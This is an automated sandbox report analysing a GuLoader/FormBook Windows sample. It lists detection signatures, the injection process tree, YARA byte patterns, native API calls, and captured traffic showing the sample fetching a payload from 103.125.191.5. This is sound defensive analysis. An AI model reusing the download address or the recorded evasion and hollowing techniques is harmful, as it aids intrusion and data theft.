Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report 2eD17GZuWs.exe

Overview

General Information

Sample Name:2eD17GZuWs.exe
Analysis ID:320425
MD5:c05eee88f0b57e853996957d6523397b
SHA1:fc16fa4ab9a88f7e2405eb9a77d168d9c1b7c8d3
SHA256:7e70e44956cdb045fd7b5c66eca50996900059fd8851aa76be19a5dd492c6918
Tags:exeGuLoader

Most interesting Screenshot:

Detection

FormBook GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Potential malicious icon found
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
Contains functionality to hide a thread from the debugger
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Yara detected VB6 Downloader Generic
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
PE file contains strange resources
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • 2eD17GZuWs.exe (PID: 4700 cmdline: 'C:\Users\user\Desktop\2eD17GZuWs.exe' MD5: C05EEE88F0B57E853996957D6523397B)
    • 2eD17GZuWs.exe (PID: 2936 cmdline: 'C:\Users\user\Desktop\2eD17GZuWs.exe' MD5: C05EEE88F0B57E853996957D6523397B)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autofmt.exe (PID: 6660 cmdline: C:\Windows\SysWOW64\autofmt.exe MD5: 7FC345F685C2A58283872D851316ACC4)
        • msiexec.exe (PID: 6680 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
          • cmd.exe (PID: 6244 cmdline: /c del 'C:\Users\user\Desktop\2eD17GZuWs.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000D.00000002.932470718.000000000329A000.00000004.00000020.sdmpLokiBot_Dropper_Packed_R11_Feb18Auto-generated rule - file scan copy.pdf.r11Florian Roth
  • 0x22bc:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
0000000D.00000002.935336977.00000000055DF000.00000004.00000001.sdmpLokiBot_Dropper_Packed_R11_Feb18Auto-generated rule - file scan copy.pdf.r11Florian Roth
  • 0x2970:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
00000001.00000002.928588896.0000000002550000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000002.928588896.0000000002550000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000002.928588896.0000000002550000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x183f9:$sqlite3step: 68 34 1C 7B E1
    • 0x1850c:$sqlite3step: 68 34 1C 7B E1
    • 0x18428:$sqlite3text: 68 38 2A 90 C5
    • 0x1854d:$sqlite3text: 68 38 2A 90 C5
    • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
    Click to see the 12 entries

    Sigma Overview

    No Sigma rule has matched

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: 2eD17GZuWs.exeVirustotal: Detection: 25%Perma Link
    Yara detected FormBookShow sources
    Source: Yara matchFile source: 00000001.00000002.928588896.0000000002550000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000001.00000002.927894177.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, type: MEMORY
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then pop esi13_2_01117295
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then pop esi13_2_011172A5

    Networking:

    barindex
    Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
    Source: TrafficSnort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.2.4:49756 -> 103.125.191.5:80
    Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
    Source: global trafficHTTP traffic detected: GET /bin_xMjelaYnr43.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 103.125.191.5Cache-Control: no-cache
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: global trafficHTTP traffic detected: GET /bin_xMjelaYnr43.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 103.125.191.5Cache-Control: no-cache
    Source: 2eD17GZuWs.exe, 00000001.00000002.928458563.000000000093D000.00000004.00000020.sdmpString found in binary or memory: http://103.125.191.5/
    Source: 2eD17GZuWs.exeString found in binary or memory: http://103.125.191.5/bin_xMjelaYnr43.bin
    Source: 2eD17GZuWs.exe, 00000001.00000002.928446229.0000000000924000.00000004.00000020.sdmpString found in binary or memory: http://103.125.191.5/bin_xMjelaYnr43.binY
    Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
    Source: explorer.exe, 0000000A.00000002.935388452.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
    Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
    Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
    Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
    Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
    Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
    Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
    Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
    Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
    Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
    Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
    Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
    Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
    Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
    Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
    Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
    Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
    Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
    Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
    Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
    Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
    Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
    Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
    Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
    Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
    Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
    Source: 2eD17GZuWs.exe, 00000001.00000002.928394579.00000000008F7000.00000004.00000020.sdmpString found in binary or memory: https://in_xMjelaYnr43.bin

    E-Banking Fraud:

    barindex
    Yara detected FormBookShow sources
    Source: Yara matchFile source: 00000001.00000002.928588896.0000000002550000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000001.00000002.927894177.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, type: MEMORY

    System Summary:

    barindex
    Malicious sample detected (through community Yara rule)Show sources
    Source: 0000000D.00000002.932470718.000000000329A000.00000004.00000020.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 0000000D.00000002.935336977.00000000055DF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 00000001.00000002.928588896.0000000002550000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 00000001.00000002.928588896.0000000002550000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Source: 00000001.00000002.927894177.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 00000001.00000002.927894177.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Source: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Potential malicious icon foundShow sources
    Source: initial sampleIcon embedded in PE file: bad icon match: 20047c7c70f0e004
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeProcess Stats: CPU usage > 98%
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D5A6C NtProtectVirtualMemory,0_2_021D5A6C
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D06B1 NtSetInformationThread,TerminateProcess,CreateFileA,0_2_021D06B1
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D5336 NtSetInformationThread,LoadLibraryA,0_2_021D5336
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D232A NtWriteVirtualMemory,0_2_021D232A
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D5F9F NtResumeThread,0_2_021D5F9F
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D078C NtWriteVirtualMemory,TerminateProcess,0_2_021D078C
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D044B EnumWindows,NtSetInformationThread,0_2_021D044B
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D54F4 NtSetInformationThread,NtWriteVirtualMemory,LoadLibraryA,0_2_021D54F4
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D260D NtWriteVirtualMemory,0_2_021D260D
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D6239 NtResumeThread,0_2_021D6239
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D62C5 NtResumeThread,0_2_021D62C5
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D2705 NtWriteVirtualMemory,0_2_021D2705
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D6325 NtResumeThread,0_2_021D6325
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D0F7D NtWriteVirtualMemory,0_2_021D0F7D
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D276A NtWriteVirtualMemory,0_2_021D276A
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D23D5 NtWriteVirtualMemory,0_2_021D23D5
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D5FC1 NtResumeThread,0_2_021D5FC1
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D47EF NtSetInformationThread,0_2_021D47EF
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D5FE5 NtResumeThread,0_2_021D5FE5
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D6015 NtResumeThread,0_2_021D6015
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D6039 NtResumeThread,0_2_021D6039
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D5435 NtWriteVirtualMemory,0_2_021D5435
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D2455 NtWriteVirtualMemory,0_2_021D2455
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D6089 NtResumeThread,0_2_021D6089
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D24BD NtWriteVirtualMemory,0_2_021D24BD
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D04B2 NtSetInformationThread,0_2_021D04B2
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D60D1 NtResumeThread,0_2_021D60D1
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D04CD NtSetInformationThread,0_2_021D04CD
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D0516 NtSetInformationThread,0_2_021D0516
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D6106 NtResumeThread,0_2_021D6106
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D0537 NtSetInformationThread,0_2_021D0537
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D2531 NtWriteVirtualMemory,0_2_021D2531
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D059D NtSetInformationThread,0_2_021D059D
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D05D9 NtSetInformationThread,0_2_021D05D9
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D61ED NtResumeThread,0_2_021D61ED
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_1E189660
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1896E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_1E1896E0
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189710 NtQueryInformationToken,LdrInitializeThunk,1_2_1E189710
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189780 NtMapViewOfSection,LdrInitializeThunk,1_2_1E189780
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1897A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_1E1897A0
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189540 NtReadFile,LdrInitializeThunk,1_2_1E189540
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1895D0 NtClose,LdrInitializeThunk,1_2_1E1895D0
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_1E189A00
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189A20 NtResumeThread,LdrInitializeThunk,1_2_1E189A20
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189A50 NtCreateFile,LdrInitializeThunk,1_2_1E189A50
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189840 NtDelayExecution,LdrInitializeThunk,1_2_1E189840
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189860 NtQuerySystemInformation,LdrInitializeThunk,1_2_1E189860
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1898F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_1E1898F0
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_1E189910
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1899A0 NtCreateSection,LdrInitializeThunk,1_2_1E1899A0
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189610 NtEnumerateValueKey,1_2_1E189610
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189650 NtQueryValueKey,1_2_1E189650
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189670 NtQueryInformationProcess,1_2_1E189670
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1896D0 NtCreateKey,1_2_1E1896D0
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E18A710 NtOpenProcessToken,1_2_1E18A710
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189730 NtQueryVirtualMemory,1_2_1E189730
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E18A770 NtOpenThread,1_2_1E18A770
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189770 NtSetInformationFile,1_2_1E189770
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189760 NtOpenProcess,1_2_1E189760
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189FE0 NtCreateMutant,1_2_1E189FE0
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E18AD30 NtSetContextThread,1_2_1E18AD30
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189520 NtWaitForSingleObject,1_2_1E189520
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189560 NtWriteFile,1_2_1E189560
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1895F0 NtQueryInformationFile,1_2_1E1895F0
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189A10 NtQuerySection,1_2_1E189A10
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189A80 NtOpenDirectoryObject,1_2_1E189A80
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189B00 NtSetValueKey,1_2_1E189B00
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E18A3B0 NtGetContextThread,1_2_1E18A3B0
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189820 NtEnumerateKey,1_2_1E189820
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E18B040 NtSuspendThread,1_2_1E18B040
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1898A0 NtWriteVirtualMemory,1_2_1E1898A0
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189950 NtQueueApcThread,1_2_1E189950
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1899D0 NtCreateProcessEx,1_2_1E1899D0
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_00565A6C NtProtectVirtualMemory,1_2_00565A6C
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_00565F9F NtSetInformationThread,1_2_00565F9F
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_00566015 NtSetInformationThread,1_2_00566015
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_00566039 NtSetInformationThread,1_2_00566039
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_005660D1 NtSetInformationThread,1_2_005660D1
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_00566089 NtSetInformationThread,1_2_00566089
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_00566106 NtSetInformationThread,1_2_00566106
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_005661ED NtSetInformationThread,1_2_005661ED
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_00566239 NtSetInformationThread,1_2_00566239
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_005662C5 NtSetInformationThread,1_2_005662C5
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_00566325 NtSetInformationThread,1_2_00566325
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_00565FC1 NtSetInformationThread,1_2_00565FC1
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_00565FE5 NtSetInformationThread,1_2_00565FE5
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119540 NtReadFile,LdrInitializeThunk,13_2_05119540
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051195D0 NtClose,LdrInitializeThunk,13_2_051195D0
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119FE0 NtCreateMutant,LdrInitializeThunk,13_2_05119FE0
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119660 NtAllocateVirtualMemory,LdrInitializeThunk,13_2_05119660
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051196E0 NtFreeVirtualMemory,LdrInitializeThunk,13_2_051196E0
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119910 NtAdjustPrivilegesToken,LdrInitializeThunk,13_2_05119910
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119860 NtQuerySystemInformation,LdrInitializeThunk,13_2_05119860
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119A50 NtCreateFile,LdrInitializeThunk,13_2_05119A50
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0511AD30 NtSetContextThread,13_2_0511AD30
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119520 NtWaitForSingleObject,13_2_05119520
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119560 NtWriteFile,13_2_05119560
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051195F0 NtQueryInformationFile,13_2_051195F0
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0511A710 NtOpenProcessToken,13_2_0511A710
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119710 NtQueryInformationToken,13_2_05119710
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119730 NtQueryVirtualMemory,13_2_05119730
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0511A770 NtOpenThread,13_2_0511A770
